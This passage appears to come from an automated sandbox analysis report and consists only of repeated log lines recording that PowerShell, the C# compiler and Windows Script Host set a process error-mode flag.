                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
